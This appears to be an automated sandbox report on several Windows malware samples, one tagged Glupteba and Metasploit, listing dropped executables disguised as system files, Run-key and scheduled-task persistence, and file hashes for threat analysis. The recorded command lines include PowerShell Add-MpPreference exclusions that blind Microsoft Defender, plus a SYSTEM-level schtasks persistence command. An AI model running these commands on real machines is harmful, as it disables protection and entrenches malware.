| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | \??\c:\users\admin\appdata\local\temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | \??\c:\users\admin\appdata\local\temp\services32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Services32.exe | N/A |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\services32.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\svchost.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Resources\tjud.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| File opened for modification | \??\c:\windows\resources\themes\explorer.exe | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| File opened for modification | \??\c:\windows\resources\spoolsv.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | \??\c:\windows\resources\svchost.exe | \??\c:\windows\resources\spoolsv.exe | N/A |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\Services32.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Services32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe
"C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe"
\??\c:\users\admin\appdata\local\temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe
c:\users\admin\appdata\local\temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' /RU "SYSTEM" & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' /RU "SYSTEM"
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
C:\Users\Admin\AppData\Local\Temp\Services32.exe
"C:\Users\Admin\AppData\Local\Temp\Services32.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry'
\??\c:\users\admin\appdata\local\temp\services32.exe
c:\users\admin\appdata\local\temp\services32.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' /RU "SYSTEM" & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Services32" /tr '"C:\Users\Admin\AppData\Local\Temp\Services32.exe"' /RU "SYSTEM"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
memory/3924-0-0x0000000000400000-0x000000000041F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337.exe
| MD5 | 5552f88a40afa2e2fef5acbd590ac812 |
| SHA1 | 5afef5451811830c1ec3108cd7ee66a0418a6186 |
| SHA256 | 9a05d71fc8bbbf8beaa8f993cb0d75cbab06ac4c9bf20fe843cfa034dd56a47f |
| SHA512 | 6de5db9d4decc44d4dba8b9097b93664d4942f9753ae6c3fd0e92496677ac93f4c37c0ceb8a07cf1b0fbe777f78eedc522b256be14e1cedfa5c3ef2da5fabbde |
memory/4536-9-0x00007FF824263000-0x00007FF824265000-memory.dmp
memory/4536-10-0x0000000000580000-0x0000000000596000-memory.dmp
memory/4728-12-0x000001F5FE6C0000-0x000001F5FE6E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0use1xyz.1vh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4728-21-0x00007FF824260000-0x00007FF824D21000-memory.dmp
memory/4728-22-0x00007FF824260000-0x00007FF824D21000-memory.dmp
memory/4728-23-0x00007FF824260000-0x00007FF824D21000-memory.dmp
memory/4728-26-0x00007FF824260000-0x00007FF824D21000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 19e1e2a79d89d1a806d9f998551c82a8 |
| SHA1 | 3ea8c6b09bcaa874efc3a220f6f61eed4be85ebd |
| SHA256 | 210f353fbdf0ed0f95aec9d76a455c1e92f96000551a875c5de55cfa712f4adc |
| SHA512 | da427ad972596f8f795ae978337e943cb07f9c5a2ed1c8d1f1cad27c07dcec2f4d4ffe9424db2b90fcba3c2f301524f52931a863efae38fca2bef1def53567b8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 34f595487e6bfd1d11c7de88ee50356a |
| SHA1 | 4caad088c15766cc0fa1f42009260e9a02f953bb |
| SHA256 | 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d |
| SHA512 | 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b |
C:\Windows\Resources\Themes\icsys.icn.exe
| MD5 | f2667d617c1c5156004ea365bc759c1c |
| SHA1 | 10592eb1cd290802867f1fa13470717fa5643f59 |
| SHA256 | e3aa603a42d20ba4f19f75839e090440cf224410b4bfd60f3aa9b95009a88792 |
| SHA512 | 1cf3faf90dfd6a0834d4d20a825def7c259955ca9b6680fc0a4ff4584e890071655c1a3ed04785cebda52fdb1e6df5f836d4b8d3e4f6c95b5553fe30123ba803 |
C:\Windows\Resources\Themes\explorer.exe
| MD5 | 5fe5ba1827d6b5250aa4e6241c559bf6 |
| SHA1 | b13cea64713587396217bd60b5337fd8efedc8a6 |
| SHA256 | 81ebdce907d2f877dee90ce17f89dcae53f8f81c3eb571611d25837602b9593f |
| SHA512 | e0b5ba7e18205f87eb3178efaefd5861c57a0f96911cdac27ccc6c487012b5124c3b9b19db956cdfc9737b5005496065d7efd28cfffadbe7dfe625762e3c41ff |
C:\Windows\Resources\spoolsv.exe
| MD5 | 21853d502d6b4020dc6031a2115db53d |
| SHA1 | 1d760bec0abae8c3c1a1782685d6542280952d05 |
| SHA256 | 229763f7658b01fbbced89313308ef81bff10ca48580db9291bb941094f03413 |
| SHA512 | 19335ce48b786a0e98cae53a5ea07a6e908d3ea61086bd10c26f3be36897e9210b4ca3d602edbdb7cd5a5fd0d9d578269a88985543056bbdcddc57cbf81bfa2f |
C:\Windows\Resources\svchost.exe
| MD5 | 623239f0da598cb9fe27e12123b9490c |
| SHA1 | 2c4a46143adabc87652cbdb5a13dcccb53d75488 |
| SHA256 | 531208c6939ff7345538ad33a4d8a74a33bfa3e6e8ac7a0964c17b54f0f8d877 |
| SHA512 | 0f69a8c58e59265021710efd00e3840751bfd52e243918a881d8ef4341b1a6781de355ef0a2a295f54a4739c50107f4919361db5c04d1508c02731f2da2bb632 |
memory/4920-95-0x0000000000400000-0x000000000041F000-memory.dmp
memory/1992-96-0x0000000000400000-0x000000000041F000-memory.dmp
memory/1484-97-0x0000000000400000-0x000000000041F000-memory.dmp
memory/3924-98-0x0000000000400000-0x000000000041F000-memory.dmp
memory/4536-99-0x0000000000F60000-0x0000000000F6C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
| MD5 | d1f4a92a1672d7d22a90e2567523d03e |
| SHA1 | a1683621e2103e1df1ce22def923e4ef62ddcd11 |
| SHA256 | 48fd7864ad054ee98f30a32006af85dce9f47cc5fccf065e7da41624cf14f94b |
| SHA512 | 2e6e4dd8ed996ca9c95e7bf225f5b7b567f2a99ae13f637f23b2c959857f9e5ba5833e279b901c0a215cf5692dc6f3e28c47106cd386756e51f5f6f1298f247a |
memory/1512-119-0x0000000000EA0000-0x0000000000EA8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Services32.exe
| MD5 | 70c771952bc897446d3ddad90541a1e6 |
| SHA1 | b00b50a893e4552651c4a5c38cf4bb9aed7a101e |
| SHA256 | aefd0c77949ccb2192070d1fb122cad87c1fc3e3c841b1928e3763fadf286337 |
| SHA512 | 33d402397289c1a828079dfdaaf3966c4b9720ffb070eeba0d5c23f4a3c6c448e4a3fd3cba2f82c712252ce03d726daabd2c66e97f950a122ffb3d5799bae56d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7be9a2900dcd650c5880a875e61f8e79 |
| SHA1 | 8ab6e5fc3744da6a6bad502e09b64976a43bef85 |
| SHA256 | 2ad8f9cd3240b85df345ebe0faba328de4cb34c73b80e46a408d769d11231f16 |
| SHA512 | 6e06fdaaf1bb2ba18214eaf79738c021ec89dd1dfdd7ceec47a8c5608a3d2940cd6f8ab492c23134683cb16ea0465446664c905697349f8a04e0f00d13b7c2cf |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da5c82b0e070047f7377042d08093ff4 |
| SHA1 | 89d05987cd60828cca516c5c40c18935c35e8bd3 |
| SHA256 | 77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5 |
| SHA512 | 7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22310ad6749d8cc38284aa616efcd100 |
| SHA1 | 440ef4a0a53bfa7c83fe84326a1dff4326dcb515 |
| SHA256 | 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf |
| SHA512 | 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ef647504cf229a16d02de14a16241b90 |
| SHA1 | 81480caca469857eb93c75d494828b81e124fda0 |
| SHA256 | 47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710 |
| SHA512 | a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e4da474e1133bf2e122229b6b94c7658 |
| SHA1 | c4f87563a1f7017dcc7ca17860766b28947a3366 |
| SHA256 | 7d9634e065c5cba387da5badc02177b8476d209f9be6885f2fe85e24db57ba49 |
| SHA512 | 06c6e4e9ea93655c5a61393acd7ab37563087d3bd472eb80233b884c6667986606cdd800add2f376e41543ba90d711dd5d3b33f83d775c0955f121899cab3752 |
memory/4392-221-0x0000000000400000-0x000000000041F000-memory.dmp
memory/4488-220-0x0000000000400000-0x000000000041F000-memory.dmp
memory/3332-222-0x0000000000400000-0x000000000041F000-memory.dmp
memory/1512-223-0x0000000001C70000-0x0000000001C76000-memory.dmp
memory/3880-225-0x0000000000400000-0x000000000041F000-memory.dmp
memory/2372-226-0x0000000000400000-0x000000000041F000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win7-20241023-en
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\54de718b634d2dbddaf2530aa3b1768823dfdd97f5a2782b4131fe369e903dd9.exe
"C:\Users\Admin\AppData\Local\Temp\54de718b634d2dbddaf2530aa3b1768823dfdd97f5a2782b4131fe369e903dd9.exe"
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
138s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\54de718b634d2dbddaf2530aa3b1768823dfdd97f5a2782b4131fe369e903dd9.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\54de718b634d2dbddaf2530aa3b1768823dfdd97f5a2782b4131fe369e903dd9.exe
"C:\Users\Admin\AppData\Local\Temp\54de718b634d2dbddaf2530aa3b1768823dfdd97f5a2782b4131fe369e903dd9.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-08 02:11
Reported
2024-11-08 02:13
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
139s
Command Line
Signatures
Glupteba
Glupteba family
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
MetaSploit
Metasploit family
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\rss\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LongWaterfall = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Checks installed software on the system
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\rss\csrss.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\AppData\Local\Temp\7ae95048117dcae6685b6d3206a013fc3e76631d0d4cb58a95f065d79c6cc8a4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
